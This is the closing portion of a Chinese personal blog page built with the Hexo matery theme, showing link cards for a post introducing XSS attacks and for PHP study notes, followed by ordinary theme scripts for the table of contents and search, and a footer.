                    <div class="summary">前端安全–XSS攻击XSS漏洞是最广泛、作用最关键的web安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环，通过XSS，黑客可以得到的最直接利益就是拿到用户浏览器的cookie，从而变相盗取用户的账号密码。
这些常用的基本</div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-07-09
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            Greypotato
                            
                        </span>
                    </div>
                </div>

                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fa fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2019/04/06/PHP/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/9.jpg" class="responsive-img" alt="PHP个人学习记录">
                        
                        <span class="card-title">PHP个人学习记录</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary">前言这篇博客记录了学习PHP中的个人理解与重要的知识点。能够更好的巩固自己所学习的知识。
PHP简介PHP 它的英文名称：Hypertext Preprocessor （学习过程中顺便记个单词） 它的中文名称：超文本预处理器。 PHP是一种</div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-04-06
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            Greypotato
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="fa fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fa fa-list"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            // headingsOffset: -205,
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).slideUp(500);
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).slideDown(500);
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>
    

</main>


<footer class="page-footer bg-color">
    <div class="container row center-align">
        <div class="col s12 m8 l8 copy-right">
            本站由&copy;<a href="https://blinkfox.github.io/" target="_blank">Blinkfox</a>基于
            <a href="https://hexo.io/" target="_blank">Hexo</a> 的
            <a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">hexo-theme-matery</a>主题搭建.

            

            
			
                <br>
                
                <span id="busuanzi_container_site_pv">
                    <i class="fa fa-heart-o"></i>
                    本站总访问量 <span id="busuanzi_value_site_pv" class="white-color"></span>
                </span>
                
                
                <span id="busuanzi_container_site_uv">
                    <i class="fa fa-users"></i>
                    次,&nbsp;访客数 <span id="busuanzi_value_site_uv" class="white-color"></span> 人.
                </span>
                
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">


    <a href="mailto:xxx@xx.xx" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fa fa-envelope-open"></i>
    </a>



    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2268512327" class="tooltipped" data-tooltip="QQ联系我: 2268512327" data-position="top" data-delay="50">
        <i class="fa fa-qq"></i>
    </a>



    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fa fa-rss"></i>
    </a>
</div>
    </div>
</footer>

<div class="progress-bar"></div>


<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fa fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字" class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->



    <script src="/libs/others/clicklove.js"></script>


    <script async src="/libs/others/busuanzi.pure.mini.js"></script>


</body>
</html>